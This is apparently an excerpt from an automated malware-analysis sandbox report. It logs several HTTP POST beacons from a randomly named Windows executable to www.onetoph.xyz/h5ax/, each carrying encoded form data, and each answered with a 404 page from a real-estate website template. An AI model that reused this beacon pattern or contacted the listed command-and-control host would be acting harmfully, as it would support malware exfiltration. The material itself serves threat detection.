                                              Sep 24, 2024 11:26:43.121746063 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a
                                              Sep 24, 2024 11:26:43.121807098 CEST1289INData Raw: 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20
                                              Data Ascii: y active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header
                                              Sep 24, 2024 11:26:43.121864080 CEST1289INData Raw: 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: erty Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:26:43.121923923 CEST1289INData Raw: 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 50 61 67 65 20 4e 6f
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try
                                              Sep 24, 2024 11:26:43.121990919 CEST1289INData Raw: 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c
                                              Data Ascii: "></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></
                                              Sep 24, 2024 11:26:43.122210026 CEST1289INData Raw: 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/propert
                                              Sep 24, 2024 11:26:43.122276068 CEST1289INData Raw: 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                              Data Ascii: or amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" typ
                                              Sep 24, 2024 11:26:43.122447968 CEST1246INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65
                                              Data Ascii: </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a> <a href=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.11.3049899209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:45.645634890 CEST778OUTPOST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 71 30 67 64 30 44 6d 34 5a 30 58 4e 30 4e 63 35 78 5a 44 63 39 2b 72 6e 45 58 62 66 43 33 66 75 4e 52 6a 4d 46 73 69 70 6d 67 47 78 43 2f 51 4c 30 33 72 6a 32 38 4d 67 51 79 48 50 48 6a 79 53 38 63 36 35 31 6e 2f 4c 44 53 4f 45 63 65 51 65 2b 49 6a 44 37 47 69 4d 47 41 4f 77 70 69 33 30 45 4e 7a 50 36 53 65 6f 58 72 72 72 45 65 45 4c 39 76 56 69 68 44 55 4d 6e 79 79 36 46 64 7a 37 54 62 4c 6e 42 47 61 31 74 39 47 2f 49 79 46 76 68 78 4b 64 66 58 68 4d 52 72 35 38 71 79 67 54 37 68 70 65 4d 4e 73 54 6a 57 63 39 33 51 4a 75 5a 46 6e 48 53 76 4f 54 65 6a 39 33 64 48 38 73 6c 6e 46 46 62 51 69 46 52 31 66 58 70 4e 36 4b 53 62 2f 4d 47 76 51 3d
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN0Nc5xZDc9+rnEXbfC3fuNRjMFsipmgGxC/QL03rj28MgQyHPHjyS8c651n/LDSOEceQe+IjD7GiMGAOwpi30ENzP6SeoXrrrEeEL9vVihDUMnyy6Fdz7TbLnBGa1t9G/IyFvhxKdfXhMRr58qygT7hpeMNsTjWc93QJuZFnHSvOTej93dH8slnFFbQiFR1fXpN6KSb/MGvQ=
                                              Sep 24, 2024 11:26:45.823584080 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:45 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:26:45.823601007 CEST1289INData Raw: 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20
                                              Data Ascii: l.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body>
                                              Sep 24, 2024 11:26:45.823708057 CEST1289INData Raw: 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76
                                              Data Ascii: ype="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id
                                              Sep 24, 2024 11:26:45.823724985 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a
                                              Sep 24, 2024 11:26:45.823827028 CEST1289INData Raw: 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20
                                              Data Ascii: y active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header
                                              Sep 24, 2024 11:26:45.823913097 CEST1289INData Raw: 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: erty Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:26:45.824019909 CEST1289INData Raw: 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 50 61 67 65 20 4e 6f
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try
                                              Sep 24, 2024 11:26:45.824033976 CEST1289INData Raw: 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c
                                              Data Ascii: "></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></
                                              Sep 24, 2024 11:26:45.824192047 CEST1289INData Raw: 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/propert
                                              Sep 24, 2024 11:26:45.824306011 CEST1289INData Raw: 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                              Data Ascii: or amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" typ
                                              Sep 24, 2024 11:26:45.824393988 CEST1246INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65
                                              Data Ascii: </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a> <a href=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.11.3049900209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:48.349849939 CEST3895OUTPOST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 71 30 67 64 30 44 6d 34 5a 30 58 4e 30 4e 63 35 78 5a 44 63 39 2b 72 6e 45 58 62 66 43 33 66 75 4e 52 6a 4d 46 73 69 70 6d 67 2b 78 43 74 59 4c 31 55 44 6a 33 38 4d 67 59 53 48 4f 48 6a 79 71 38 63 69 39 31 6e 6a 78 44 51 47 45 54 63 59 65 2f 39 50 44 78 47 69 4d 50 67 4f 7a 74 69 33 68 45 4a 58 4c 36 53 4f 6f 58 72 72 72 45 64 63 4c 71 74 74 69 6a 44 55 44 74 53 79 32 42 64 7a 58 54 62 44 64 42 47 65 6c 74 37 79 2f 49 46 42 76 68 43 75 64 66 58 68 4d 57 72 35 68 71 79 38 57 37 68 68 4b 4d 49 49 70 67 69 63 39 31 32 51 52 47 46 72 4c 4a 38 4f 44 44 42 6c 4c 61 30 38 6b 67 6d 4e 56 56 32 79 6a 66 33 62 43 6f 59 7a 51 4b 4f 57 47 46 50 67 50 73 77 58 71 4a 45 61 6d 58 43 4c 4e 48 45 32 42 4f 46 53 55 46 51 54 4d 38 33 47 77 70 7a 62 53 78 68 38 52 73 41 38 69 69 46 63 6f 69 69 51 32 31 35 31 38 64 75 61 74 55 63 50 42 2b 51 67 43 43 4f 70 4d 41 42 45 4f 59 54 7a 70 67 4a 31 6f 66 32 4a 31 6d 32 6f 39 6e 65 39 70 79 4e 49 75 53 47 78 76 79 4d 2b 41 57 76 4e 59 6c 37 6b 6f 71 7a 4a 49 4e 79 [TRUNCATED]
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN0Nc5xZDc9+rnEXbfC3fuNRjMFsipmg+xCtYL1UDj38MgYSHOHjyq8ci91njxDQGETcYe/9PDxGiMPgOzti3hEJXL6SOoXrrrEdcLqttijDUDtSy2BdzXTbDdBGelt7y/IFBvhCudfXhMWr5hqy8W7hhKMIIpgic912QRGFrLJ8ODDBlLa08kgmNVV2yjf3bCoYzQKOWGFPgPswXqJEamXCLNHE2BOFSUFQTM83GwpzbSxh8RsA8iiFcoiiQ21518duatUcPB+QgCCOpMABEOYTzpgJ1of2J1m2o9ne9pyNIuSGxvyM+AWvNYl7koqzJINyB7dKPDP4z2Rx0O611isl7s7PHjCvuG1jiuSWl/kLvSmaDAdG9Aamy2hl+7Jg0TpAVJ/IKQ049Au5YkzudhO1TZiT+qFBoz68Jresw1QN9RbouBxftRRLjQ2RklxOjm3g98HkXVFoHHykdURYleVmWJyYCAYQPL5W89tBZPbb/jKyYdYdvWxwJewKleGsREdjtCD8pT1t4zTM/2A57/FrSJVbwnXCbiYRY/2zSM32t91DzhJDTQqwfIrW4Vo2oTsSsSVg9pMeW0SbcCR+SpRP4VVlG0Qe9wh1uMwWOOrmKLW3EbIaoxqvcdEta4F4sPXTVmrFV4R8ZcjHe+wpkjKUml09ZkcoQ1Foh5oAMsq2ndcL+vuueVQgAPqaN+oxcHhROEI0H9jRwMRKJtpoef6kdIVlGkROg3EYnKyFabvUHCfZQEEU1gc7vKLWjGu+hRBpZQKT7j2KZeC7M8KYc5+KN2jEMFiFcT1utQckzQPFUi5GSIk9o/uc3SHysLW2vib48Q/2sBFo35+/6ZNiUDk26bytwIOppnbwR5A2BIYcJkaJkUoWZNPY1eZDKfuV+JraszxUWelSetpCN8Y2nPO4NngHenlk8Ibj9K3WenYjMfH6P5YhpL4YY0s8FLbxZ77rTy7/3s6gVyCAlrdANdS94+FqYXFqqO+rRf [TRUNCATED]
                                              Sep 24, 2024 11:26:48.534060001 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:48 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:26:48.534099102 CEST1289INData Raw: 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20
                                              Data Ascii: l.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body>
                                              Sep 24, 2024 11:26:48.534120083 CEST1289INData Raw: 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76
                                              Data Ascii: ype="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id
                                              Sep 24, 2024 11:26:48.534140110 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a
                                              Sep 24, 2024 11:26:48.534158945 CEST1289INData Raw: 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20
                                              Data Ascii: y active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header
                                              Sep 24, 2024 11:26:48.534178972 CEST1289INData Raw: 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: erty Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:26:48.534615993 CEST1289INData Raw: 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 50 61 67 65 20 4e 6f
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try
                                              Sep 24, 2024 11:26:48.534758091 CEST1289INData Raw: 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c
                                              Data Ascii: "></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></
                                              Sep 24, 2024 11:26:48.534909010 CEST1289INData Raw: 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/propert
                                              Sep 24, 2024 11:26:48.534948111 CEST1289INData Raw: 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                              Data Ascii: or amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" typ
                                              Sep 24, 2024 11:26:48.534969091 CEST1246INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65
                                              Data Ascii: </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a> <a href=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.11.3049901209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
